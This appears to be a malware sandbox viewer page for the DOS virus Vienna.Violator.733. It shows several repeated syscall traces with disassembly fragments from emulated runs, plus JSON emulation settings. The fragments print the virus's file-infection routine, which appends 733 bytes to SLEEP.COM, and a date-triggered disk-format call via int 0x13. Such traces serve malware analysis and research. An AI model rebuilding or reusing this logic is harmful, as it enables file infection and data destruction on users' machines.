Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Violator.733

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:29.575457693Z 48 PC: 12a6b | Get DOS version
2018-12-17T23:11:29.576988565Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T23:11:29.57796348Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T23:11:29.578877552Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
2018-12-17T23:11:29.581170672Z 42 PC: 12aa4 | Get date 0x12aa4: cmp dh, 0xb
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
0x12ac5: inc byte ptr [0x365]
0x12ac9: loop 0x12ab8
0x12acb: mov ah, 5
0x12acd: mov ch, 0
0x12acf: mov dh, 0
0x12ad1: mov dl, byte ptr [0x365]
2018-12-17T23:11:29.583103034Z 42 PC: 12ab0 | Get date 0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
0x12ac5: inc byte ptr [0x365]
0x12ac9: loop 0x12ab8
0x12acb: mov ah, 5
0x12acd: mov ch, 0
0x12acf: mov dh, 0
0x12ad1: mov dl, byte ptr [0x365]
0x12ad5: int 0x13
0x12ad7: ret
0x12ad8: pop si
0x12ad9: push si
0x12ada: add si, 0x2d
0x12add: nop
2018-12-17T23:11:29.586500426Z 78 PC: 12b5b | Find first file
2018-12-17T23:11:29.592476303Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T23:11:29.598123399Z 67 PC: 12bab | Get or set file attributes
2018-12-17T23:11:29.614371113Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:29.620709552Z 87 PC: 12bc2 | Get or set file date and time
2018-12-17T23:11:29.621986588Z 44 PC: 12bce | Get time 0x12bce: and dh, 7
0x12bd1: jne 0x12be3
0x12bd3: mov ah, 0x40
0x12bd5: mov cx, 5
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d
0x12bde: int 0x21
0x12be0: jmp 0x12c47
0x12be2: nop
0x12be3: mov ah, 0x3f
0x12be5: mov cx, 3
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si
0x12bee: int 0x21
0x12bf0: jb 0x12c47
0x12bf2: cmp ax, 3
0x12bf5: jne 0x12c47
0x12bf7: mov ax, 0x4202
0x12bfa: mov cx, 0
2018-12-17T23:11:29.624776737Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:11:29.630885983Z 66 PC: 12c02 | Move file pointer
2018-12-17T23:11:29.639363716Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-17T23:11:29.64801905Z 66 PC: 12c38 | Move file pointer
2018-12-17T23:11:29.649373537Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:29.656609004Z 87 PC: 12c5a | Get or set file date and time
2018-12-17T23:11:29.658021094Z 62 PC: 12c5e | Close file
2018-12-17T23:11:29.666307027Z 67 PC: 12c6d | Get or set file attributes
2018-12-17T23:11:29.676242528Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.017499274Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.019248596Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.021897003Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:14.023483367Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.03261111Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.041049752Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.047293975Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.064145842Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.072160694Z 87 PC: 12bc2 | Get or set file date and time
2018-12-25T12:55:14.074092541Z 44 PC: 12bce | Get time 0x12bce: and dh, 7
0x12bd1: jne 0x12be3
0x12bd3: mov ah, 0x40
0x12bd5: mov cx, 5
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d
0x12bde: int 0x21
0x12be0: jmp 0x12c47
0x12be2: nop
0x12be3: mov ah, 0x3f
0x12be5: mov cx, 3
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si
0x12bee: int 0x21
0x12bf0: jb 0x12c47
0x12bf2: cmp ax, 3
0x12bf5: jne 0x12c47
0x12bf7: mov ax, 0x4202
0x12bfa: mov cx, 0
2018-12-25T12:55:14.07694953Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.084978387Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.087105316Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.096743036Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.098365949Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.108455494Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.110342202Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.119522828Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.132315607Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.057638827Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.059127925Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.060194136Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:14.061185685Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.064361002Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.070169912Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.075544847Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.097481562Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.1040591Z 87 PC: 12bc2 | Get or set file date and time
2018-12-25T12:55:14.105370534Z 44 PC: 12bce | Get time 0x12bce: and dh, 7
0x12bd1: jne 0x12be3
0x12bd3: mov ah, 0x40
0x12bd5: mov cx, 5
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d
0x12bde: int 0x21
0x12be0: jmp 0x12c47
0x12be2: nop
0x12be3: mov ah, 0x3f
0x12be5: mov cx, 3
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si
0x12bee: int 0x21
0x12bf0: jb 0x12c47
0x12bf2: cmp ax, 3
0x12bf5: jne 0x12c47
0x12bf7: mov ax, 0x4202
0x12bfa: mov cx, 0
2018-12-25T12:55:14.107616282Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.114113845Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.11556503Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.124090012Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.125574291Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.13183987Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.133156063Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.140655626Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.147801136Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.440718323Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.442648921Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.443667498Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:14.444611306Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.44754986Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.453428864Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.458853021Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.475273984Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.481654842Z 87 PC: 12bc2 | Get or set file date and time
2018-12-25T12:55:14.483020095Z 44 PC: 12bce | Get time 0x12bce: and dh, 7
0x12bd1: jne 0x12be3
0x12bd3: mov ah, 0x40
0x12bd5: mov cx, 5
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d
0x12bde: int 0x21
0x12be0: jmp 0x12c47
0x12be2: nop
0x12be3: mov ah, 0x3f
0x12be5: mov cx, 3
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si
0x12bee: int 0x21
0x12bf0: jb 0x12c47
0x12bf2: cmp ax, 3
0x12bf5: jne 0x12c47
0x12bf7: mov ax, 0x4202
0x12bfa: mov cx, 0
2018-12-25T12:55:14.485479659Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.49165702Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.492890976Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.501642008Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.504103687Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.510611515Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.512039437Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.520686045Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.530382039Z 26 PC: 12c7a | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":17206,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.640675494Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:14.642055669Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:14.643351673Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:14.644353016Z 42 PC: 12a97 | Get date 0x12a97: cmp cx, 0x7ca
0x12a9b: jge 0x12aa0
0x12a9d: jmp 0x12ad8
0x12a9f: nop
0x12aa0: mov ah, 0x2a
0x12aa2: int 0x21
0x12aa4: cmp dh, 0xb
0x12aa7: jge 0x12aac
0x12aa9: jmp 0x12ad8
0x12aab: nop
0x12aac: mov ah, 0x2a
0x12aae: int 0x21
0x12ab0: cmp dl, 0xd
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12ad8
0x12ab7: nop
0x12ab8: mov al, byte ptr [0x365]
0x12abb: call 0x12acb
0x12abe: cmp byte ptr [0x365], 0x19
0x12ac3: je 0x12ad8
2018-12-25T12:55:14.646048982Z 78 PC: 12b5b | Find first file
2018-12-25T12:55:14.651242259Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T12:55:14.655813185Z 67 PC: 12bab | Get or set file attributes
2018-12-25T12:55:14.669010527Z 61 PC: 12bb6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.676432908Z 87 PC: 12bc2 | Get or set file date and time
2018-12-25T12:55:14.677873417Z 44 PC: 12bce | Get time 0x12bce: and dh, 7
0x12bd1: jne 0x12be3
0x12bd3: mov ah, 0x40
0x12bd5: mov cx, 5
0x12bd8: mov dx, si
0x12bda: add dx, 0x9d
0x12bde: int 0x21
0x12be0: jmp 0x12c47
0x12be2: nop
0x12be3: mov ah, 0x3f
0x12be5: mov cx, 3
0x12be8: mov dx, 0x1d
0x12beb: nop
0x12bec: add dx, si
0x12bee: int 0x21
0x12bf0: jb 0x12c47
0x12bf2: cmp ax, 3
0x12bf5: jne 0x12c47
0x12bf7: mov ax, 0x4202
0x12bfa: mov cx, 0
2018-12-25T12:55:14.680186044Z 63 PC: 12bf0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:14.689924784Z 66 PC: 12c02 | Move file pointer
2018-12-25T12:55:14.691569193Z 64 PC: 12c26 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:55:14.704479356Z 66 PC: 12c38 | Move file pointer
2018-12-25T12:55:14.706542959Z 64 PC: 12c47 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:14.713715501Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T12:55:14.71525927Z 62 PC: 12c5e | Close file
2018-12-25T12:55:14.724139017Z 67 PC: 12c6d | Get or set file attributes
2018-12-25T12:55:14.735076748Z 26 PC: 12c7a | Set disk transfer address